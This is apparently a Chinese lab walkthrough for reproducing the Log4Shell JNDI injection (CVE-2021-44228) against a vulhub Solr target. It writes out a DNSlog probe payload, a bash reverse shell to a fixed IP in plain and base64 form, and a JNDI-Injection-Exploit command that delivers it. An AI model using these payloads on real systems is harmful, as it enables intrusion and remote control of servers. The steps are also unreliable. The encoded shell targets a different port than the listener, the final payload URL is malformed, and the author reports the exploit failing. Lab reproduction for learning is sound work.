log4j2漏洞复现

项目地址

git clone https://github.com/vulhub/vulhub.git

第一步

执行以下命令启动环境并访问

systemctl start docker
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d

访问此界面即成功访问靶场

第二步：

使用http://dnslog.cn/获取一个域名来检测我们的注入效果，当然，自己搭dns也可以。

第三步：

参数上传位置，不要问我为什么是这里，他就是这里!

可以发现 /solr/admin/cores?action= 这里有个参数可以传，可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录，我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.btddko.dnslog.cn}

代码换成在dnslog处获得的域名

刷新dns页面即可获得回显的java版本号，也就是说这里存在漏洞

步骤四:开始反弹Shel准备 JNDI-Iniection-Exploit 下载地址并构造PayLoad如下..启动!

项目地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell语句

bash -i >& /dev/tcp/1.92.134.1/9239 0>&1

反弹shell-base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzkyMzkgMD4mMQ==

命令模板

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsipl]
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzY1NDUgMD4mMQ==}|{base64,-d}|bash" -A 1.92.134.1

步骤五

以上可以看到有三个服务，看到熟悉的rmi和dap ，实际上这个jar的作用就是帮我们生成了恶意代码类，并且生成了对应的url，然后我们就可以回到刚才的网站去进行JNDI注入.这里在注入之前另启动一个终端开启监听.

nc -l 9239

vps防火墙开启端口8180/1099/1389

步骤六

拿取JDK1.8井构造Payload且直接访问.可以看到网页被重定向到了我们的恶意类网址...

/solr/admin/cores?action=${jndi:ldap://http://1.92.134.1:8983:1389/dit7xv}

访问一下，然后应该能连接上，但是连不上，打出GG